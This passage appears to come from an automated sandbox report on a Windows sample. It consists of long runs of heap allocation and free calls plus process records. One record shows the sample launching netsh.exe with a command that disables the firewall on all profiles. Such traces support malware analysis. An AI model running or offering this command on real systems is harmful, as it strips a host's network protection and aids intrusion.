hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1fb0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1fd0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1ff0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2010 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2030 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2090 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f20b0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f20d0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f20f0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2110 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2130 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2150 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2170 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2190 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f21b0 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f21d0 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f21f0 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2210 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2230 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2250 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2270 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2290 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f22b0 | out: hHeap=0x2d0000) returned 1 [0196.245] GetProcessHeap () returned 0x2d0000 [0196.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f22d0 | out: hHeap=0x2d0000) returned 1 [0196.245] exit (_Code=0) Thread: id = 174 os_tid = 0x388 Thread: id = 191 os_tid = 0x5b4 Thread: id = 196 os_tid = 0xb70 Thread: id = 197 os_tid = 0xb30 Thread: id = 198 os_tid = 0x7d8 [0194.956] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x345820 [0194.956] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b60 [0194.956] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x30e4f0 [0194.956] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x35d770 [0194.956] LocalReAlloc (hMem=0x30e4f0, uBytes=0x20, uFlags=0x2) returned 0x32f3e0 [0194.959] LocalFree (hMem=0x345820) returned 0x0 [0194.962] LocalFree (hMem=0x35d770) returned 0x0 [0194.962] LocalFree (hMem=0x32f3e0) returned 0x0 [0194.962] LocalFree (hMem=0x356b60) returned 0x0 Process: id = "14" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x5ab33000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xba0" cmd_line = "\"netsh.exe\" Advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 126 os_tid = 0x6a0 [0120.430] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fd10 | out: lpSystemTimeAsFileTime=0x16fd10*(dwLowDateTime=0xf651e840, dwHighDateTime=0x1d6a20a)) [0120.430] GetCurrentProcessId () returned 0x38c [0120.430] GetCurrentThreadId () returned 0x6a0 [0120.430] GetTickCount () returned 0x11535a1 [0120.430] QueryPerformanceCounter (in: lpPerformanceCount=0x16fd18 | out: lpPerformanceCount=0x16fd18*=24048374035) returned 1 [0120.430] GetModuleHandleW (lpModuleName=0x0) returned 0xd00000 [0120.430] __set_app_type (_Type=0x1) [0120.430] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd0ad14) returned 0x0 [0120.431] __wgetmainargs (in: _Argc=0xd155c0, _Argv=0xd155d0, _Env=0xd155c8, _DoWildCard=0, _StartInfo=0xd155dc | out: _Argc=0xd155c0, _Argv=0xd155d0, _Env=0xd155c8) returned 0 [0120.431] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.431] GetModuleHandleW (lpModuleName=0x0) returned 0xd00000 [0120.432] _vsnwprintf (in: _Buffer=0xd17a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x167868 | out: _Buffer="netsh>") returned 6 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2707a0 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2707c0 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2707e0 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270800 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270820 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270840 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270890 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2708b0 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2708d0 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2708f0 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270910 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270930 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270950 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270970 [0120.432] GetProcessHeap () returned 0x250000 [0120.432] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270990 [0120.432] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2709b0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2709d0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2709f0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270a10 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270a30 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270a50 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270a70 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270a90 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270ab0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270ad0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270af0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270b10 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270b30 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270b50 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270b70 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270b90 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270bb0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270bd0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270bf0 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270c10 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270c30 [0120.433] GetProcessHeap () returned 0x250000 [0120.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270c50 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270c70 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270c90 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270cb0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270cd0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270cf0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270d10 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270d30 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270d50 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270d70 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270d90 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270db0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270dd0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270df0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270e10 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270e30 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270e50 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270e70 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270e90 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270eb0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270ed0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270ef0 [0120.434] GetProcessHeap () returned 0x250000 [0120.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270f10 [0120.434] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270f30 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270f50 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270f70 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270f90 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270fb0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270fd0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x270ff0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271010 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271030 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271090 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2710b0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2710d0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2710f0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271110 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271130 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271150 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271170 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271190 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2711b0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2711d0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2711f0 [0120.435] GetProcessHeap () returned 0x250000 [0120.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271210 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271230 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271250 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271270 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271290 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2712b0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2712d0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2712f0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271310 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271330 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271350 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271370 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271390 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2713b0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2713d0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2713f0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271410 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271430 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271450 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271470 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271490 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2714b0 [0120.436] GetProcessHeap () returned 0x250000 [0120.436] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2714d0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2714f0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271510 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271530 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271550 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271570 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271590 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2715b0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2715d0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2715f0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271610 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271630 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271650 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271670 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271690 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2716b0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2716d0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2716f0 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271710 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271730 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271750 [0120.437] GetProcessHeap () returned 0x250000 [0120.437] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271770 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271790 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2717b0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2717d0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2717f0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271810 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271830 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271890 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2718b0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2718d0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2718f0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271910 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271930 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271950 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271970 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271990 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2719b0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2719d0 [0120.438] GetProcessHeap () returned 0x250000 [0120.438] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2719f0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271a10 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271a30 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271a50 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271a70 [0120.439] GetProcessHeap () returned 0x250000 